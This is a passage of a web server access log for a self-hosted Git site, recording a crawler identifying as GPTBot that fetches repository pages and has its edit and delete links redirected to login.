"https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fimages%2fControlRoom5.png" [Client 74.7.227.38] [Length 22738] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10223] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:14:47:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:47:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322709] [Gzip 27.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:14:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:14:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fimages%2fControlRoom1.png" [Client 74.7.227.38] [Length 22722] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fimages%2fControlRoom6.png" [Client 74.7.227.38] [Length 22724] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets%2fimages%2fControlRoom7.png" [Client 74.7.227.38] [Length 18732] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" +[17/Feb/2026:14:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fimages%2fControlRoom2.png" [Client 74.7.227.38] [Length 22743] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fimages%2fControlRoom4.png" [Client 74.7.227.38] [Length 22739] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker%2fapp%2ffetcher.py" [Client 74.7.227.38] [Length 32573] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:14:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/docker-compose.yml" [Client 74.7.227.38] [Length 12828] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:14:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/update_status.py" [Client 74.7.227.38] [Length 13167] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:14:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10171] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode" +[17/Feb/2026:14:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode" +[17/Feb/2026:14:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 151002] [Gzip 17.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:14:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" +[17/Feb/2026:14:47:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" +[17/Feb/2026:14:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/docker-compose.yml" +[17/Feb/2026:14:47:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" +[17/Feb/2026:14:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/update_status.py" +[17/Feb/2026:14:47:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" +[17/Feb/2026:14:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/update_status.py" +[17/Feb/2026:14:47:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" +[17/Feb/2026:14:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/docker-compose.yml" +[17/Feb/2026:14:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/docker-compose.yml" [Client 74.7.227.38] [Length 10437] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" +[17/Feb/2026:14:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/update_status.py" [Client 74.7.227.38] [Length 808] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" +[17/Feb/2026:14:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/docker-compose.yml" [Client 74.7.227.38] [Length 2549] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" +[17/Feb/2026:14:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" +[17/Feb/2026:14:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/update_status.py" [Client 74.7.227.38] [Length 12740] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" +[17/Feb/2026:14:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/docker-compose.yml" [Client 74.7.227.38] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" +[17/Feb/2026:14:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/update_status.py" [Client 74.7.227.38] [Length 9778] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" +[17/Feb/2026:14:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/docker-compose.yml" [Client 74.7.227.38] [Length 13816] [Gzip 6.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" +[17/Feb/2026:14:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11630] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" +[17/Feb/2026:14:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fservices" [Client 74.7.227.38] [Length 25030] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services" +[17/Feb/2026:14:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11630] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" +[17/Feb/2026:14:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" +[17/Feb/2026:14:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" +[17/Feb/2026:14:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" [Client 74.7.227.38] [Length 9871] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" +[17/Feb/2026:14:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 32570] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" +[17/Feb/2026:14:48:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/update_status.py" +[17/Feb/2026:14:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/update_status.py" +[17/Feb/2026:14:48:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/update_status.py" +[17/Feb/2026:14:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/update_status.py" +[17/Feb/2026:14:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" [Client 74.7.227.38] [Length 11049] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" +[17/Feb/2026:14:48:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/docker-compose.yml" +[17/Feb/2026:14:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/docker-compose.yml" +[17/Feb/2026:14:48:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/docker-compose.yml" +[17/Feb/2026:14:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 